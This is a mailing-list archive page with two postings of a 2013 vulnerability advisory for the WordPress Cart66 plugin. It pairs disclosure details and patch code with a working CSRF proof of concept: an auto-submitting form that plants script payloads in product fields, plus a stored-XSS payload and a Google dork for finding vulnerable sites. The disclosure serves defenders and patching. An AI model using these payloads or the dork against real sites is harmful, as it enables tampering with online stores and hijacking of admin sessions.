subject:"Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities"

Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities

2013-10-14 Thread jsibley1

# Exploit Title: Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities
# Exploit Author:absane
# Blog:  http://blog.noobroot.com
# Discovery date:September 29th 2013
# Vendor notified:   September 29th 2013
# Vendor fixed:  October 12 2013
# Vendor Homepage:   http://cart66.com
# Software Link: 
http://downloads.wordpress.org/plugin/cart66-lite.1.5.1.14.zip
# Tested on: Wordpress 3.6.1
# Google-dork:   inurl:/wp-content/plugins/cart66
# CVE (CSRF):CVE-2013-5977
# CVE (XSS): CVE-2013-5978

Two vulnerabilities were discovered in the Wordpress plugin Cart66 version 
1.5.1.14.

Vulnerabilities:
1) CSRF
2) Code Injection

VULNERABILITY #1

*** CSRF ***

Page affected: 
http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products


Proof of Concept


htmlbody
form name=csrf_form 
action=http://192.168.196.135/wordpress/wp-admin/admin.php?page=cart66-products;
 method=post enctype=multipart/form-data id=products-form
input type=hidden name=cart66-action value=save product /
input type=hidden name=product[id] value= /
input class=long type=hidden name='product[name]' id='product-name' 
value='absane was here' /
input type='hidden' name='product[item_number]' id='product-item_number' 
value='1337' /
input type='hidden' id=product-price name='product[price]' value='13.37' /
input type='hidden' id=product-price_description 
name='product[price_description]' value='LuLz' /
input type='hidden' id=product-is_user_price name='product[is_user_price]' 
value='0' /
input type=hidden id=product-min_price name='product[min_price]' value='' 
/
input type=hidden id=product-max_price name='product[max_price]' value='' 
/
input type='hidden' id=product-taxable name='product[taxable]' value='0'
input type='hidden' id=product-shipped name='product[shipped]' value='1'
input type=hidden id=product-weight name=product[weight] value=  /
input type=hidden id=product-min_qty name='product[min_quantity]' value='' 
/
input type=hidden id=product-max_qty name='product[max_quantity]' value='' 
/
script type=text/javascriptdocument.csrf_form.submit();/script
/body/html

VULNERABILITY #2
***
*** Code Injection  ***
***
Page affected: 
http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products in the 
following input fields:
* Product name
* Price description


Proof of Concept

In the vulnerable fields add scriptalert(0)/script or any other code. The 
code is placed directly into the database.

Input is not sanatized and the code can be executed in ways that depend on the 
circumstances. During testing, the theme 'iShop 1.0.0' was used and the PoC 
JavaScript code was executed when I attempted to add a product or modify an 
existing product.


][
]..SOLUTIONS.[
][

Update to version 1.5.1.15 or greater.

Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities

2013-10-11 Thread jsibley1

# Exploit Title: Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities
# Exploit Author:absane
# Blog:  http://blog.noobroot.com
# Discovery date:September 29th 2013
# Vendor notified:   September 29th 2013
# Vendor fixed:  October 2 2013
# Vendor Homepage:   http://cart66.com
# Software Link: 
http://downloads.wordpress.org/plugin/cart66-lite.1.5.1.14.zip
# Tested on: Wordpress 3.6.1
# Google-dork:   inurl:/wp-content/plugins/cart66
# CVE (CSRF):CVE-2013-5977
# CVE (XSS): CVE-2013-5978

Two vulnerabilities were discovered in the Wordpress plugin Cart66 version 
1.5.1.14.

Vulnerabilities:
1) XSS (Stored)
2) CSRF


VULNERABILITY #1
***
*** Stored XSS  ***
***
Page affected: 
http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products in the 
following input fields:
* Product name
* Price description


Proof of Concept

In the vulnerable fields add scriptalert(0)/script 

The product name XSS vuln is particiularly dangerous because an attacker can 
use the CSRF vulnerability to add a product whose 

name is a malicious script. All the admin user needs to do is view the product 
to be attacked.


//
\\


VULNERABILITY #2

*** CSRF ***

Page affected: 
http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products

If the Wordpress admin were logged in and clicked on a link hosting code 
similar to the one in the PoC, then the admin may 

unknowingly add a product to his site or have an existing product altered. 
Other possibilities include, but are not limited 

to, injecting code into a field vulnerable to stored XSS (see the second 
vulnerability).


Proof of Concept

Host this code on a remote wesbserver different from the Wordpress site that 
uses Cart66. As an authenticated Wordpress admin 

user visit the page and add what you will to the fields. A new product is 
added. In a live attack, the fields will be hidden, 

prefilled, and some javascript code will auto submit the fields.


htmlbody
form name=csrf_form 
action=http://192.168.196.135/wordpress/wp-admin/admin.php?page=cart66-products;
 method=post 

enctype=multipart/form-data id=products-form
input type=hidden name=cart66-action value=save product /
input type=hidden name=product[id] value= /
input class=long type=hidden name='product[name]' id='product-name' 
value='scriptalert(pwned)/script' /
input type='hidden' name='product[item_number]' id='product-item_number' 
value='1337' /
input type='hidden' id=product-price name='product[price]' value='13.37' /
input type='hidden' id=product-price_description 
name='product[price_description]' value='scriptalert(;))/script' /
input type='hidden' id=product-is_user_price name='product[is_user_price]' 
value='0' /
input type=hidden id=product-min_price name='product[min_price]' value='' 
/
input type=hidden id=product-max_price name='product[max_price]' value='' 
/ 
input type='hidden' id=product-taxable name='product[taxable]' value='0'
input type='hidden' id=product-shipped name='product[shipped]' value='1'
input type=hidden id=product-weight name=product[weight] value=  /
input type=hidden id=product-min_qty name='product[min_quantity]' value='' 
/
input type=hidden id=product-max_qty name='product[max_quantity]' value='' 
/
script type=text/javascriptdocument.csrf_form.submit();/script
/body/html


][
]..SOLUTIONS.[
][

Grab the latest update! Or... 

XSS

In products.php, replace the line:
$product-setData($_POST['product']);

with:
$product-setData(Cart66Common::postVal('product'));

CSRF

In products.php, replace the following:

form action=admin.php?page=cart66-products method=post 
enctype=multipart/form-data id=products-form
  input type=hidden name=cart66-action value=save product /
  input type=hidden name=product[id] value=?php echo $product-id ? /
  div id=widgets-left style=margin-right: 50px;
div id=available-widgets

with:

form action=admin.php?page=cart66-products method=post 
enctype=multipart/form-data id=products-form
  input type=hidden name=cart66_product_nonce value=?php echo 
wp_create_nonce('cart66_product_nonce'); ? /
  input type=hidden name=cart66-action value=save product /
  input type=hidden name=product[id] value=?php echo $product-id ? /
  div id=widgets-left style=margin-right: 50px;
div id=available-widgets

And, in Cart66Product.php replace the validate() function with:

  public function validate() {
$errors = array();

if(!wp_verify_nonce($_POST['cart66_product_nonce'], 
'cart66_product_nonce')) {
  $errors['nonce

Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities

Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities

2 matches

Site Navigation

Mail list logo

Footer information